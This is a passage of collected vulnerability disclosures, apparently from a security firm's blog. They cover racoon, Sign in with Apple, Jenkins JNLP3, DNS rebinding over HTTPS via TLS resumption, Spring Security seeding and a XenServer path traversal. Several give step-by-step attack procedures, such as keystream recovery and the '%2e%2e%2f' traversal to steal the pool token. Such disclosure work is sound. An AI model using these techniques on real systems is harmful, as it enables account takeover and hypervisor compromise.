In some cases where variable length elements are used, the check if the buffer had enough data for the variable length part was also slightly off, also due to failing to take into account the length of the header of the current packet. In the example above, on line 587 the code checks that len > tlen, but this fails to take into account the fact that the size of the header the element has not yet been subtracted from tlen (as can be seen at line 753).

The end result was that in many places where packets are being parsed it was possible to read a couple of additional bytes from the buffer as if they are part of the packet. In many cases, it was possible to observe information about those bytes externally. For example, depending on the element type, the connection might be aborted if an OOB byte was 0x00.

These were fixed by Apple in iOS 13.5 (CVE-2020-9837).


VPNs are intended to offer security for users on an untrusted network. However, with the introduction of Network Extensions, the OS now also needs to protect itself against a potentially malicious VPN app. Properly securing an existing feature for such a new context is difficult. This is even more difficult due to the use of an existing, but abandoned, project. The way racoon is written, C code with complicated pointer arithmetic, makes spotting these bugs very difficult. It is very likely that more memory corruption bugs can be found in it.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple-account, a prompt is shown to authenticate using TouchID instead. If you authenticate, you’re immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

We expect that the primary use-case of this feature is not for signing in on iCloud (as it is pretty rare to use in Safari on a phone), but we expect that the main motivator was for “Sign in with Apple” on the web, for which this feature works as well. For those sites additional options are shown when creating a new account, for example whether to hide your email address.

Although all of this works in both macOS and iOS, with TouchID and FaceID and for all sites using AppleID logins, we’ll use iOS, TouchID and to explain the vulnerability, but keep in mind that the impact is more broad.

Logging in on Apple domains happens using OAuth2. On, this uses the web_message mode. This works as follows when doing a normal login:

  1. embeds an iframe pointing to & &response_type=code.
  2. The user logs in (including steps such as entering a 2FA-token) inside the iframe.
  3. If the authentication succeeds, the iframe posts a message back to the parent window with a grant_code for the user using window.parent.postMessage(<token>, "") in JavaScript.
  4. The grant_code is used by the page to continue the login process.

Two of the parameters are very important in the iframe URL: the client_id and redirect_uri. The server keeps track of a list of registered clients and the redirect URIs that are allowed for each client. In the case of the web_message flow, the redirect URI is not used as a real redirect, but instead it is used as the required page origin of the posted message with the grant code (the second argument for postMessage).

For all OAuth2 modes, it is very important that the authentication server validates the redirect URI correctly. If it does not do that, then the user’s grant_code could be sent to a malicious webpage instead. When logging in on the website, performs that check correctly: changing the redirect_uri to anything else results in an error page.

When the user authenticates using TouchID, the iframe is handled differently, but the outer page remains the same. When Safari detects a new page with a URL matching the example URL above, it does not download the page, but it invokes the process AKAppSSOExtension instead. This process communicates with the AuthKit daemon (akd) to handle the biometric authentication and to retrieve a grant_code. If the user successfully authenticates then Safari injects a fake response to the pending iframe request which posts the message back, in the same way that the normal page would do if the authentication had succeeded. akd communicates with an API on, to which it sends the details of the request and from which it receives a grant_code.

What we found was that the API had a bug: even though the client_id and redirect_uri were included in the data submitted to it by akd, it did not check that the redirect URI matches the client ID. Instead, there was only a whitelist applied by AKAppSSOExtension on the domains. All domains ending with, and were allowed. That may sound secure enough, but keep in mind that has hundreds (if not thousands) of subdomains. If any of these subdomains can somehow be tricked into running malicious JavaScript then they could be used to trigger the prompt for a login with the iCloud client_id, allowing that script to retrieve the user’s grant code if they authenticate. Then the page can send it back to an attacker which can use it to obtain a session on

Some examples of how that could happen:

  • A cross-site scripting vulnerability on any subdomain. These are found quite regularly, lists at least 30 candidates from 2019, and that just covers the domains that are important enough to investigate.
  • A dangling subdomain that can be taken over by an attacker. While we are not aware of any instances of this happening to Apple, recently someone found 670 subdomains of available for takeover:
  • A user visiting a page on any subdomain over HTTP. The important subdomains will have a HSTS header, but many will not. The domain is not HSTS preloaded with includeSubdomains.

The first two require the attacker to trick users into visiting the malicious page. The third requires that the attacker has access to the user’s local network. While such an attack is in general harder, it does allow a very interesting example: When an Apple device connects to a wifi-network, it will try to access If the response does not match the usual response, then the system assumes there is a captive portal where the user will need to do something first. To allow the user to do that, the response page is opened and shown. Usually, this redirects the user to another page where they need to login, accept terms and conditions, pay, etc. However, it does not need to do that. Instead, the page could embed JavaScript which triggers the TouchID login, which will be allowed as it is on an subdomain. If the user authenticates, then the malicious JavaScript receives the user’s grant_code.

The page could include all sorts of content to make the user more likely to authenticate, for example by making the page look like it is part of iOS itself or a “Sign in with Apple” button. “Sign in with Apple” is still pretty new, so user’s might not notice that the prompt is slightly different than usual. Besides, many users will probably automatically authenticate when they see a TouchID prompt as those are almost always about them authenticating to the phone, the fact that users should also determine if they want to authenticate to the page which opened the prompt is not made obvious.

By setting up a fake hotspot in a location where users expect to receive a captive portal (for example at an airport, hotel or train station), it would have been possible to gain access to a significant number of iCloud accounts, which would have allowed access to backups of pictures, location of the phone, files and much more. As I mentioned, this also bypasses the normal 2FA approve + 6-digit code step.

We reported this vulnerability to Apple, and they fixed it the same day they triaged it. The API now correctly checks that the redirect_uri matches the client_id. Therefore, this could be fixed entirely server-side.

It makes a lot of sense to us how this vulnerability could have been missed: people testing this will probably have focused on using untrusted domains for the redirect_uri. For example, sometimes it works to use or In this case those both fail, however, by trying just those you would miss the ability to use a malicious subdomain.

The video below illustrates the vulnerability.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

Jenkins supports 4 different versions of the remoting protocol. 1 and 2 are unencrypted, 3 uses a custom handshake protocol and 4 is secured using TLS. The vulnerability exists only in version 3.

1, 2 and 3 are deprecated and warnings are shown when they are enabled. However, these warnings and the documentation only mention stability impact, no security impact, such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:


Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:


The encryption algorithm used is AES/CTR/PKCS5Padding:



As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able decrypt the server’s challenge, which is around 2080 bytes. All other packets are smaller than that.


There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to decrypt the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: The attacker encrypts a message that is exactly as long as the keystream the attacker currently knows and appends one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client if the connection can be intercepted and the client automatically reconnects. We did not spend time performing this.


It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, JNLP1 and JNLP2 protocols are safer to use as those can only be taken over if a connection is intercepted. A safer encrypted alternative already exists (JNLP4), so investing time in fixing this protocol would not be needed.


We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.


2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins
2020-01-30 This advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is the problems with HTTPS.


It is possible to perform a DNS rebinding attack to a HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple-Handshake Attack 3SHAKE, however, the measures that were taken by TLS implementations in response to that attack do not adequately defend against this attack.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “Unknown Key-Share Attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the certificate of the server, both endpoints will assume that the certificate is still the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p. Therefore, they are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections.

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record, therefore it resumes the connection at S, which will work as it recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as the original connection did. Because A removed certain cipher suites, the ClientHello that is used for resumption will most certainly indicate stronger ciphers than the cipher the original connection had. A server could detect this and then decide to perform a full handshake instead, because this way a stronger cipher suite would be used. It appears that few servers actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when a ClientHello is received that indicates support for EMS that requests to resume a session that did not use EMS, IIS allows it to be resumed. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack still works in pretty much the same way.

While the example above used the RSA key exchange, as noted by the 3SHAKE attack the DHE or ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE is removed in all common browsers (except Firefox) and arbitrary ECDHE curves appears to never have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret. The TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name that is indicated for SNI. While a large portion of webservers is configured to reject unknown Host headers, almost no HTTPS servers were found that reject the handshake when an unknown SNI name is received, servers most often reply with a certain “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name for the original connection. If this is not the case then it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, this may require a long time for all caches to obtain the updated record. This is not required for the attack: A can include two IP addresses in the in the A/AAAA record, the first being A’s own address, the second the address of the victim. Once A has delivered the JavaScript and session ID/ticket, A can reject connections from the user (by sending a TCP RST response), which means the browser will fall back to the second IP address, therefore connecting to S instead.


We wrote a tool to accept TLS connections and perform the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume its session at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed. (


To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact scale of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first 2 requirements.


Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will not allow TLS sessions to be resumed if EMS was not used and the implementation of EMS on the server was fixed to not allow non-EMS sessions to be resumed using an EMS-handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.


2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicted the documentation that states that adding a custom seed does not decrease the entropy. The cause of this bug is the use of the Java SecureRandom API in an incorrect way. This vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically-secure randomness. This vulnerability was fixed by Pivotal by ensuring that the proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance generated this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance the seed is incorporated into the state, to supplement its randomness. However, when calling setSeed() on a instance newly created with an explicit algorithm there is no state yet, therefore the seed will set the entire state and no other entropy is used.

This is mentioned in the documentation for SecureRandom.getInstance():

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading, as the first two sentences may give the impression that the instance could be unsafe to use without seeding, while the self-seeding will in fact be much safer than supplying the seed for almost all applications.

This is a well known flaw in the design that can lead to incorrect use that has been discussed before:

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining


The SecureRandomFactoryBean class in spring-security returns a SecureRandom object with SHA1PRNG as explicit provider. It is optionally possible to set a Resource as a seed:


public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);

    return rnd;

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

When used with a seed this means that a SecureRandom instance is generated in the vulnerable way as described above. In other words, the Resource entirely determines all output of this PRNG. If two different objects are created with the same seed then they will return identical output. The note in the documentation stating that it supplements the seed and can not reduce randomness was therefore false.


The easiest way to prevent this vulnerability would be to request the first byte even if a seed is set, before calling setSeed():

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());

This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.


Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed() or ensuring that the seed itself has sufficient entropy.


Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.


2019-03-08 Report sent to [email protected].
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

XenServer - path traversal leading to authentication bypass

14 August 2018 at 00:00

During a brief code review of XenServer, Computest found and exploited a vulnerability in the XAPI management service that allows an attacker to bypass authentication and remotely perform arbitrary XAPI calls with administrative privileges.

This vulnerability can be further exploited to execute arbitrary shell commands as the operating system “root” user on the Dom0 virtual machine. The Dom0 is the component that manages the hypervisor, and has full control over all the virtual machines as well as the network and storage resources attached to the system.

To exploit this vulnerability an attacker has to be on a network that can reach one of the IPs and ports the XAPI service is available on (port numbers are 80 and 443 by default). Alternatively they can perform the attack through the browser of a user who has access to this port, via either a DNS rebinding attack or possibly by using the primary vulnerability to mount a cross-site scripting attack by using it to read a logfile containing attacker-controlled HTML.

This was not a full audit and further issues may or may not be present.

About XenServer and XAPI

About XenServer:

XenServer is the leading open source virtualization platform, powered by the Xen Project hypervisor and the XAPI toolstack. It is used in the world’s largest clouds and enterprises.

Technical support for XenServer is available from Citrix.


About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.


While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason compromising a hypervisor is always a high priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on any IP assigned to the hypervisor (actually the Dom0, to be precise). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.

Either way, because of the importance of a hypervisor it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
           if check_rbac
           then (* rbac checks *)
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e
           else (* no rbac checks *)
             callback req ic context

So in short: if Rbac.is_rbac_enabled_for_http_action returns true, authentication is not needed. Otherwise assert_credentials is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
    "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)
    "post_cli";  (* CLI commands -> calls XMLRPC *)
    "post_json"; (* JSON -> calls XMLRPC *)
    "get_root";  (* Make sure that downloads, personal web pages etc do not go through RBAC asking for a password or session_id *)
    (* also, without this line, fails on non_resource_cmd and bad_resource_cmd with a 401 instead of 404 *)
    "get_blob"; (* Public blobs don't need authentication *)
    "post_root_options"; (* Preflight-requests are not RBAC checked *)

Authentication is performed in the function assert_credentials_ok, in the file /ocaml/xapi/ Some things to note about this function:

  • Besides username and password or an existing session_id, access can be granted by passing the pool_token parameter. This is a static token shared by all nodes in the pool, and is stored at /etc/xensource/ptoken. This token grants full administrative privileges.

  • Adminstrative access is granted for connections over a local UNIX socket.

This means that any vulnerability that can perform an arbitrary file read or access an internal socket will enable full administrative access.

Finding the primary vulnerability

Since there are not too many endpoints that bypass authentication, it makes sense to quickly skim over each one to see if there is anything interesting.

The mapping from HTTP verb (GET, POST, …) and URL to action name is located in the files under /ocaml/idl/datamodel*.m, and the mapping from action name to handler function happens in various calls to the add_handler function we already saw. We use this to find that, for example, the action get_pool_update_download is associated with a GET request to the /update/ URL, and is dispatched to the pool_update_download_handler function:

let pool_update_download_handler (req: Request.t) s _ =
  debug "pool_update.pool_update_download_handler URL %s" req.Request.uri;
  (* remove any dodgy use of "." or ".." NB we don't prevent the use of symlinks *)
  let filepath = String.sub_to_end req.Request.uri (String.length Constants.get_pool_update_download_uri)
                 |> Filename.concat Xapi_globs.host_update_dir
                 |> Stdext.Unixext.resolve_dot_and_dotdot 
                 |> Uri.pct_decode  in
  debug "pool_update.pool_update_download_handler %s" filepath;

  if not(String.startswith Xapi_globs.host_update_dir filepath) || not (Sys.file_exists filepath) then begin
    debug "Rejecting request for file: %s (outside of or not existed in directory %s)" filepath Xapi_globs.host_update_dir;
    Http_svr.response_forbidden ~req s
  end else begin
    Http_svr.response_file s filepath;
    req.Request.close <- true

This immediately looks extremely suspicious, in particular these two lines:

|> Stdext.Unixext.resolve_dot_and_dotdot
|> Uri.pct_decode  in

Here, the code is first resolving any ../ sequences, and after that it will perform decoding of urlencoding sequences such as %25. (In OCaml, the |> operator behaves somewhat like the | (pipe) operator in unix shell scripts.)

This means that if the decoding produces new ../ sequences, they will not be resolved and the naive check below it to verify that the produced path is under the update root directory is no longer sufficient.

In short, this leads to a classic path traversal vulnerability where %2e%2e%2f sequences can be used to escape the parent directory and read arbitrary files, including the file containing the pool token.

As described earlier, possession of the pool token enables full administrative access to the hypervisor.

Some notes about a potential alternative to the DNS rebinding attack

One other thing to note is that the response does not set a HTTP Content-Type header, which might make it possible for attackers to exploit a XAPI service on an internal network from the internet if they can trick someone on the internal network into visiting a malicious site (a scenario similar to the previously described DNS rebinding attack).

